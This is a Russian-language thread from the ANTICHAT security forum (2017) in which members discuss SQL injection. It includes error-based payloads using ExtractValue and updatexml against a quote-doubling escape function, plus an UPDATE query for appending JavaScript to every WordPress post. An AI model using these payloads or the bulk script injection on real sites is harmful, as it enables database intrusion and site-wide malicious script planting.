HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2071  
Старый 14.10.2017, 20:42
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Как в акунетикс настроить скан без тестирование повторяющихся страниц index.php?id=1, index.php?id=2, index.php?id=3
 
Ответить с цитированием

  #2072  
Старый 14.10.2017, 22:14
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию

Добрый вечер, вопрос уже задавал не могу найти где мне ответили, вообщем, какой запрос чтоб вывести перечень соседних БД при sql inject?
 
Ответить с цитированием

  #2073  
Старый 17.10.2017, 22:42
BadBoris
Guest
Сообщений: n/a
Провел на форуме:
289

Репутация: 0
По умолчанию

Всем привет!

Недавно обнаружил, что есть доступ к моим БД извне: nauchniestati.ru/phpmyadmin/

Насколько это опасно? Как это исправить?

Там ещё какие-то ошибки в файлах

./../php/php-gettext/streams.php

./../php/php-gettext/gettext.php

Кто-нибудь может помочь?
 
Ответить с цитированием

  #2074  
Старый 20.10.2017, 20:24
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Интересует возможность SQL Injection при такои фильтрацыии

Код:
Code:
function mssql_custom_escape($str, $trim = true, $encode = true) {
    if(get_magic_quotes_gpc()) {
        $str = stripslashes($str);
    }
    if ($trim) $str = trim($str);
    if ($encode) $str = htmlspecialchars($str);

    return preg_replace("#'#", "''", $str);
}
 
Ответить с цитированием

  #2075  
Старый 20.10.2017, 20:58
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Если запрос что то типо:

Цитата:
Сообщение от None  
?id=123+%27+or(ExtractValue(1,version()))+--+\
то как вариант вывод при уязвимом параметре не обремененном кавычками

Цитата:
Сообщение от None  
select * from users where id=123 '' or(ExtractValue(1,version())) -- \
т.е получается как SQLI можно разкрутить, второй пример как вариант обремененными кавычками:

Цитата:
Сообщение от None  
select * from users where id=
'
123 '' or(ExtractValue(1,version())) -- \
'
т.е можно разкрутить как ErrorBased
 
Ответить с цитированием

  #2076  
Старый 20.10.2017, 23:24
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Код:
Code:
select * from users where id='123 '' or(ExtractValue(1,version())) -- \'
Непонял получяются 3 кавычке запрос не выполнется
 
Ответить с цитированием

  #2077  
Старый 21.10.2017, 00:34
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от Octavian  
Octavian said:

Код:
Code:
select * from users where id='123 '' or(ExtractValue(1,version())) -- \'
Непонял получяются 3 кавычке запрос не выполнется
по пробуй updatexml
 
Ответить с цитированием

  #2078  
Старый 22.10.2017, 23:12
panic.ker
Guest
Сообщений: n/a
Провел на форуме:
35643

Репутация: 3
По умолчанию

Цитата:
Сообщение от garrik  
garrik said:

Господа, можно ли раскрутить этот баг ? Добавление символов "%2527" к ссылке приводит к такой ошибке
Будут ли какие-то соображения ? буду сильно благодарен любой информации
Иньекция в limit'е после order by. Советую ознакомиться

https://rdot.org/forum/showpost.php?...6&postcount=30
 
Ответить с цитированием

  #2079  
Старый 23.10.2017, 16:22
Kirza
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Всем привет - Можно ли как то в PhpMyAdmin в базе wp_post - колонка post_content = добавить во все посты сразу, путём составления запроса - свой яваскрипт , если такая возможность есть - напишите.
 
Ответить с цитированием

  #2080  
Старый 23.10.2017, 17:26
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от Kirza  
Kirza said:

Всем привет - Можно ли как то в PhpMyAdmin в базе wp_post - колонка post_content = добавить во все посты сразу, путём составления запроса - свой яваскрипт , если такая возможность есть - напишите.
как то так:

update wp_post set post_content=post_content+'JSSCRIPT'
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ